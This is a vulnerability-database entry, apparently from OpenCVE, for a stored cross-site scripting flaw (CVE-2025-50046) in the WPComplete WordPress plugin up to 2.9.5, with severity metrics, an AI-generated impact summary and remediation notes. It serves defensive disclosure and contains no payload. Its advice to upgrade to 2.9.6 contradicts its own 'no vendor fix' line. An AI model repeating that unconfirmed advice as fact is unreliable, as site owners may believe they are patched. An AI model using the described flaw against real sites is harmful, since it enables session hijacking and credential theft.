Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in StellarWP WPComplete wpcomplete allows Stored XSS.This issue affects WPComplete: from n/a through <= 2.9.5.
Published: 2025-06-20
Score: 6.5 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

StellarWP WPComplete allows attacker‑controlled input to be saved in the database and later displayed unescaped in generated web pages, creating a stored cross‑site scripting (XSS) vulnerability. An attacker who can inject content via the plugin’s interface can execute malicious scripts in the browsers of any user who views the affected pages, potentially hijacking sessions, stealing credentials or defacing the site. The weakness is improper input neutralization (CWE‑79).

Affected Systems

All WordPress sites running the WPComplete plugin version 2.9.5 or earlier are affected. The vulnerability applies to every release from the initial version through 2.9.5, so any site using that plugin without an upgrade is vulnerable.

Risk and Exploitability

The CVSS score is 6.5, indicating a moderate risk level. The EPSS score of less than 1 % reflects a low probability of exploitation in the wild, and the vulnerability is not listed in the CISA KEV catalog. The likely attack path involves an authenticated administrator or user with permission to add or edit content through the plugin. Once the malicious payload is stored, any site visitor will receive it, making the impact potentially global to the site’s audience.

Generated by OpenCVE AI on April 30, 2026 at 11:01 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade the WPComplete plugin to at least version 2.9.6 if a newer version is available.
  • If an upgrade cannot be performed immediately, disable or uninstall the WPComplete plugin to eliminate the attack surface.
  • Implement site‑wide content sanitization or install a security plugin that blocks script tags in post content as a temporary workaround.

Generated by OpenCVE AI on April 30, 2026 at 11:01 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
EUVD EUVD EUVD-2025-19019 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in StellarWP WPComplete allows Stored XSS. This issue affects WPComplete: from n/a through 2.9.5.
History

Thu, 23 Apr 2026 15:00:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Wed, 01 Apr 2026 23:45:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in StellarWP WPComplete allows Stored XSS. This issue affects WPComplete: from n/a through 2.9.5. Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in StellarWP WPComplete wpcomplete allows Stored XSS.This issue affects WPComplete: from n/a through <= 2.9.5.
References
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Tue, 24 Jun 2025 14:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 20 Jun 2025 15:15:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in StellarWP WPComplete allows Stored XSS. This issue affects WPComplete: from n/a through 2.9.5.
Title WordPress WPComplete plugin <= 2.9.5 - Cross Site Scripting (XSS) Vulnerability
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Subscriptions

No data.

cve-icon MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T16:13:16.924Z

Reserved: 2025-06-11T16:08:50.967Z

Link: CVE-2025-50046

cve-icon Vulnrichment

Updated: 2025-06-24T13:38:05.857Z

cve-icon NVD

Status : Deferred

Published: 2025-06-20T15:15:31.003

Modified: 2026-04-23T15:32:02.533

Link: CVE-2025-50046

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-30T11:15:35Z

Weaknesses